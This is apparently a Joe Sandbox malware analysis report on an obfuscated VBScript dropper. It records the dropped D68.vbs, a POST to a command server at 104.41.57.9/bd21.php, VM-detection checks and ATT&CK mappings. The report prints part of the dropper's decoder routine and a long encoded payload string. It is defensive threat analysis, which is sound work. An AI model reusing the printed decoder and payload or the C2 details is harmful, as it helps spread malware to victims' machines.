
ID: 310931
Sample Name: 44S5D444F55G8222Y55UU44S4S.vbs
Cookbook: default.jbs
Time: 07:32:12
Date: 07/11/2020
Version: 31.0.0 Red Diamond

Table of Contents

Table of Contents 2
Analysis Report 44S5D444F55G8222Y55UU44S4S.vbs 4
  Overview 4
    General Information 4
    Detection 4
    Signatures 4
    Classification 4
    Startup 4
    Malware Configuration 4
    Yara Overview 4
    Sigma Overview 4
    Signature Overview 4
      AV Detection: 5
      Data Obfuscation: 5
      Persistence and Installation Behavior: 5
      Malware Analysis System Evasion: 5
      HIPS / PFW / Protection Evasion: 5
    Mitre Att&ck Matrix 5
    Behavior Graph 6
    Screenshots 6
      Thumbnails 6
  Antivirus, Machine Learning and Genetic Malware Detection 7
    Initial Sample 7
    Dropped Files 7
    Unpacked PE Files 7
    Domains 7
    URLs 7
  Domains and IPs 8
    Contacted Domains 8
    Contacted URLs 8
    URLs from Memory and Binaries 8
    Contacted IPs 8
      Public 9
  General Information 9
  Simulations 10
    Behavior and APIs 10
  Joe Sandbox View / Context 10
    IPs 10
    Domains 10
    ASN 10
    JA3 Fingerprints 11
    Dropped Files 11
  Created / dropped Files 11
  Static File Info 11
    General 11
    File Icon 12
  Network Behavior 12
    TCP Packets 12
    HTTP Request Dependency Graph 12
    HTTP Packets 12
  Code Manipulations 13
  Statistics 13
  Behavior 13
  System Behavior 14
    Analysis Process: wscript.exe PID: 6124 Parent PID: 3388 14
      General 14
      File Activities 14
        File Created 14
        File Written 14
      Registry Activities 15
    Analysis Process: wscript.exe PID: 5560 Parent PID: 6124 15
      General 15
      File Activities 15
  Disassembly 15
    Code Analysis 15

Copyright null 2020 Page 2 of 15

Analysis Report 44S5D444F55G8222Y55UU44S4S.vbs

Overview

General Information

Sample Name: 44S5D444F55G8222Y55UU44S4S.vbs
Analysis ID: 310931
MD5: 75de44228bea09…
SHA1: e95857291d694e…
SHA256: 2bfdb7103140e24…
Tags: vbs malicious

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures (colour legend in the original: malicious / suspicious / clean)

• Antivirus detection for URL or domain
• Multi AV Scanner detection for submitted file
• System process connects to network
• VBScript performs obfuscated calls to suspicious functions
• Queries sensitive BIOS Information
• Windows Shell Script Host drops VBS files
• Contains capabilities to detect virtual…
• Creates a process in suspended mo…
• Found WSH timer for Javascript or V…
• Internet Provider seen in connection…
• Java / VBScript file with very long s…
• Monitors certain registry keys / valu…
• Queries sensitive Operating System…
• Tries to load missing DLLs
• Uses a known web browser user age…

Classification

Radar chart in the original; its axes are Ransomware, Miner, Spreading, Evader, Phishing, Exploiter, Banker, Spyware, Trojan / Bot and Adware. The "Most interesting Screenshot" panel is an image.

Startup

System is w10x64
• wscript.exe (PID: 6124, cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\44S5D444F55G8222Y55UU44S4S.vbs', MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • wscript.exe (PID: 5560, cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\Public\D68.vbs', MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
• cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

• AV Detection
• Networking
• System Summary
• Data Obfuscation
• Persistence and Installation Behavior
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection


AV Detection:

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions

Persistence and Installation Behavior:

Windows Shell Script Host drops VBS files

Malware Analysis System Evasion:

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Mitre Att&ck Matrix

One line per tactic, entries in the report's column order; the trailing numbers are the signature counts shown in the report.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation 1 1; Scripting 2 2 1; PowerShell 1; At (Windows); Cron; Launchd
Persistence: DLL Side-Loading 1; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Privilege Escalation: Process Injection 1 1 1; DLL Side-Loading 1; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Defense Evasion: Masquerading 1; Virtualization/Sandbox Evasion 2; Process Injection 1 1 1; Scripting 2 2 1; Obfuscated Files or Information 1; DLL Side-Loading 1
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Query Registry 1; Security Software Discovery 2 1; Virtualization/Sandbox Evasion 2; File and Directory Discovery 1; System Information Discovery 1 1 2; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Command and Control: Ingress Tool Transfer 1; Non-Application Layer Protocol 2; Application Layer Protocol 1 2; Protocol Impersonation; Fallback Channels; Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service

Behavior Graph

The behavior graph is an image in the original (ID: 310931, Sample: 44S5D444F55G8222Y55UU44S4S.vbs, Startdate: 07/11/2020, Architecture: WINDOWS, Score: 80). Recoverable content:

wscript.exe (started)
  -> dropped C:\Users\Public\D68.vbs (ASCII)
  -> started wscript.exe
     -> 104.41.57.9, 49715, 80 (MICROSOFT-CORP-MSN-AS-BLOCKUS, United States)

Signatures attached to the graph:
• Antivirus detection for URL or domain
• Multi AV Scanner detection for submitted file
• Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
• VBScript performs obfuscated calls to suspicious functions
• Windows Shell Script Host drops VBS files
• System process connects to network (likely due to code injection or exploit)

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
44S5D444F55G8222Y55UU44S4S.vbs | 17% | Virustotal |

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
104.41.57.9/lp1 | 0% | Avira URL Cloud | safe
104.41.57.9/bd21.php | 2% | Virustotal |
104.41.57.9/bd21.php | 100% | Avira URL Cloud | malware
104.41.57.9/s | 0% | Avira URL Cloud | safe
104.41.57.9/m/lp1 | 0% | Avira URL Cloud | safe
104.41.57.9/lp1a | 0% | Avira URL Cloud | safe
104.41.57.9/ | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
104.41.57.9/bd21.php | true | 2%, Virustotal; Avira URL Cloud: malware | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
104.41.57.9/lp1 | wscript.exe, 00000001.00000003.245871543.0000016B21B20000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
104.41.57.9/s | wscript.exe, 00000001.00000003.242422439.0000016B21B02000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
104.41.57.9/m/lp1 | wscript.exe, 00000001.00000003.233165119.0000016B239B2000.00000004.00000001.sdmp; wscript.exe, 00000001.00000003.229377713.0000016B21B20000.00000004.00000001.sdmp; wscript.exe, 00000001.00000003.250838421.0000016B21B1E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
104.41.57.9/lp1a | wscript.exe, 00000001.00000003.233165119.0000016B239B2000.00000004.00000001.sdmp; wscript.exe, 00000001.00000003.241903538.0000016B21B20000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
104.41.57.9/ | wscript.exe, 00000001.00000003.233165119.0000016B239B2000.00000004.00000001.sdmp; wscript.exe, 00000001.00000003.228741835.0000016B21B20000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.41.57.9 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | true

General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 310931
Start date: 07.11.2020
Start time: 07:32:12
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 4m 17s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 44S5D444F55G8222Y55UU44S4S.vbs
Cookbook file name: default.jbs
Analysis system description: 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 24
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabled, EGA enabled, HDC enabled, AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal80.evad.winVBS@3/1@0/1

EGA Information: Failed
HDC Information: Failed
HCA Information: Successful, ratio: 100%
Number of executed functions: 0
Number of non-executed functions: 0
Cookbook Comments:
  Adjust boot time
  Enable AMSI
  Found application associated with file extension: .vbs
Warnings:
  Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
  Report size getting too big, too many NtOpenKeyEx calls found.
  Report size getting too big, too many NtProtectVirtualMemory calls found.
  Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
104.41.57.9 | HKLDSHAIUGRWQHHDSGWJDGW.vbs | malicious | 104.41.57.9/bd21.php

Domains

No context

ASN


JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\Public\D68.vbs

Process: C:\Windows\System32\wscript.exe
File Type: ASCII text, with very long lines, with no line terminators
Category: dropped
Size (bytes): 1355
Entropy (8bit): 5.1507433823189634
Encrypted: false
SSDEEP: 24:/73NoxUFl8V+VDuAl8TxXCBi7EB3jVXkkiBql+IX/hTqOFk24Z9N6eX1kquOx0Vd:/LNoGu557EZjVh8TIvh+1jl/+d
MD5: ADA53E881D7709E386381A662A26D1C6
SHA1: 07DB9653653DEA5690C7990D8DB560DC4D1474C6
SHA-256: AF5C358C14F127C316CB5E130E6500894B91A4AC42BCA63CA401227CC8371697
SHA-512: 968DA3F67508B4A4926FFFCE9F900E2DA2A191613760B9490174601AD6FBA2F284F3A06FE874BE2560CE3B605D773FB64C81D512979B3561843F7FDE27788C7D
Malicious: true
Reputation: low
Preview: on error resume next:w1=29:w1=w1+36:dim w2:w2=68:w2=w2+3:dim w3:w3=20:w3=w3+5:function chpped(bwdnru):muqhbif=w2:wjinnmrel=asc(Mid(bwdnru,1,1))-w1:bwdnru=Mid(bwdnru,2,Len(bwdnru)-1):qgsey="":while(Len(bwdnru)>0)qgsey=qgsey&(Chr((((asc(Mid(bwdnru,1,1))-w1))*w3+(asc(Mid(bwdnru,2,1))-w1)-wjinnmrel-muqhbif))):bwdnru=Mid(bwdnru,3,Len(bwdnru)-2):wEnd:chpped=qgsey:end function:dim wk1:wk1="AGXHNHGGUHMHBHHHGEDHJEUELHJEWEMFEHJEVFHGSHLGUELFXHBGVELHJEWEPEUEPEUEMEMEQFAEYFEHJEWFHFXHBGVELHJEWEPEVEPFWGWHGELHJEWEMEQEUEMFEHJEXFHEFEFEFEFFEHPHAHBHEGWELFWGWHGELHJEWEMFIEWEMHJEXFHHJEXEJELFNHAHKELELELELGSHLGUELFXHBGVELHJEWEPEUEPEUEMEMEQFAEYEMEMENEVEYEOELGSHLGUELFXHBGVELHJEWEPEVEPEUEMEMEQFAEYEMEQHJEVEQFBEUEMEMEMFEHJEWFHFXHBGVELHJEWEPEWEPFWGWHGELHJEWEMEQEVEMFEHPFPHGGVFEHJEUFHHJEXFEGWHGGVEDGXHNHGGUHMHBHHHGFEHLGWHMEDHHFSFHEDFNHKGWGSHMGWGAGTHCGWGUHMELEFEFFXHBGUHKHHHLHHGXHMERGJFXFWFSGFGFGBEFEFEMFEHHFSERHHHIGWHGEDEFEFHIHHHLHMEFEFEPEDEFEFHAHMHMHIFEESESEUETEXEREXEUEREYFBERFDESGTGVEVEUERHIHAHIEFEFEDEPEDETFEHHFSERHLGWH

Static File Info

General

File type: ASCII text, with CRLF line terminators
Entropy (8bit): 5.315743931350532
TrID: 669 Tracker Module (2002/1) 100.00%
File name: 44S5D444F55G8222Y55UU44S4S.vbs
File size: 6606
MD5: 75de44228bea0944af0a36729f513d18
SHA1: e95857291d694ef8162ae176c3b7c29c99b0152b
SHA256: 2bfdb7103140e24549c8d263e237613e1f9d01f9bfbb62cfff7fbe395a2f8285
SHA512: 733d8964f623fb668af929be08b9bdbd605a0d8104108e0a36658492a447f90d651a04e31dbba617fdb805a18a2f286a06a9339f6865079cd27c2b29e5d2ae37

SSDEEP: 192:2/JW7Du2bkqsAGlX49VpoSwU0sJkQk6YEsePMHcci9BnpqSJOzZxkCiFwofeXOQK:2/JW7DVnv
File Content Preview (".." marks a CRLF in the report's rendering): if (left("dfgdrthdfh",5) <> right("dfgdrthdfh",6)) then..function wrpl(w1, w2, w4)..w3 = "".. while (InStr(w1,w2) <> 0 ) .. w3 = w3 + left(w1, InStr(w1,w2)-1) & w4.. w1 = right (w1, len(w1) - InStr(w1,w2)).. wend..rpl = w3 + w1..end Function....function

File Icon

Icon Hash: e8d69ece869a9ec4

Network Behavior

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 7, 2020 07:33:03.102250099 CET | 49715 | 80 | 192.168.2.3 | 104.41.57.9
Nov 7, 2020 07:33:03.307905912 CET | 80 | 49715 | 104.41.57.9 | 192.168.2.3
Nov 7, 2020 07:33:03.308109999 CET | 49715 | 80 | 192.168.2.3 | 104.41.57.9
Nov 7, 2020 07:33:03.309449911 CET | 49715 | 80 | 192.168.2.3 | 104.41.57.9
Nov 7, 2020 07:33:03.310700893 CET | 49715 | 80 | 192.168.2.3 | 104.41.57.9
Nov 7, 2020 07:33:03.514910936 CET | 80 | 49715 | 104.41.57.9 | 192.168.2.3
Nov 7, 2020 07:33:03.515522957 CET | 80 | 49715 | 104.41.57.9 | 192.168.2.3
Nov 7, 2020 07:33:03.518367052 CET | 80 | 49715 | 104.41.57.9 | 192.168.2.3
Nov 7, 2020 07:33:03.518410921 CET | 80 | 49715 | 104.41.57.9 | 192.168.2.3
Nov 7, 2020 07:33:03.518457890 CET | 80 | 49715 | 104.41.57.9 | 192.168.2.3
Nov 7, 2020 07:33:03.518482924 CET | 80 | 49715 | 104.41.57.9 | 192.168.2.3
Nov 7, 2020 07:33:03.518496037 CET | 80 | 49715 | 104.41.57.9 | 192.168.2.3
Nov 7, 2020 07:33:03.518574953 CET | 49715 | 80 | 192.168.2.3 | 104.41.57.9
Nov 7, 2020 07:33:03.518631935 CET | 49715 | 80 | 192.168.2.3 | 104.41.57.9
Nov 7, 2020 07:33:03.518639088 CET | 49715 | 80 | 192.168.2.3 | 104.41.57.9
Nov 7, 2020 07:33:03.518642902 CET | 49715 | 80 | 192.168.2.3 | 104.41.57.9
Nov 7, 2020 07:33:08.523752928 CET | 80 | 49715 | 104.41.57.9 | 192.168.2.3
Nov 7, 2020 07:33:08.524023056 CET | 49715 | 80 | 192.168.2.3 | 104.41.57.9
Nov 7, 2020 07:33:26.413630009 CET | 49715 | 80 | 192.168.2.3 | 104.41.57.9

HTTP Request Dependency Graph

104.41.57.9

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49715 | 104.41.57.9 | 80 | C:\Windows\System32\wscript.exe

Timestamp: Nov 7, 2020 07:33:03.309449911 CET
kBytes transferred: 76
Direction: OUT
Data:
POST /bd21.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; /7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 104.41.57.9
Content-Length: 3
Connection: Keep-Alive
Cache-Control: no-cache

Timestamp: Nov 7, 2020 07:33:03.518367052 CET
kBytes transferred: 78
Direction: IN
Data:
HTTP/1.1 200 OK
Date: Sat, 07 Nov 2020 06:33:03 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 5721
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/; charset=UTF-8
Data Raw / Data Ascii: hex and ASCII dump of the gzip-compressed body (omitted here).

Code Manipulations

Statistics

Behavior


System Behavior

Analysis Process: wscript.exe PID: 6124 Parent PID: 3388

General

Start time: 07:33:00
Start date: 07/11/2020
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\44S5D444F55G8222Y55UU44S4S.vbs'
Imagebase: 0x7ff6970d0000
File size: 163840 bytes
MD5 hash: 9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

File Activities

File Created

Source | File Path | Access | Attributes | Options | Completion | Count | Address | Symbol
| C:\Users\Public\D68.vbs | read attributes | synchronize | generic write | device | synchronous io non alert | non directory file | success or wait | 1 | 7FFB52341571 | CreateFileW

File Written

Source | File Path | Offset | Length | Value | Ascii | Completion | Count | Address | Symbol
| C:\Users\Public\D68.vbs | unknown | 1355 | (hex dump of the bytes shown in the Ascii column; omitted here) | on error resume next:w1=29:w1=w1+36:dim w2:w2=68:w2=w2+3:dim w3:w3=20:w3=w3+5:function chpped(bwdnru):muqhbif=w2:wjinnmrel=asc(Mid(bwdnru,1,1))-w1:bwdnru=Mid(bwdnru,2,Len(bwdnru)-1):qgsey="":while(Len(bwdnru)>0)qgsey=qgsey&(Chr((((asc(Mid(bwdnru,1,1))-w1) | success or wait | 1 | 7FFB5234E70B | WriteFile

Registry Activities


Analysis Process: wscript.exe PID: 5560 Parent PID: 6124

General

Start time: 07:33:01
Start date: 07/11/2020
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\System32\WScript.exe' 'C:\Users\Public\D68.vbs'
Imagebase: 0x7ff6970d0000
File size: 163840 bytes
MD5 hash: 9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

File Activities



Disassembly

Code Analysis
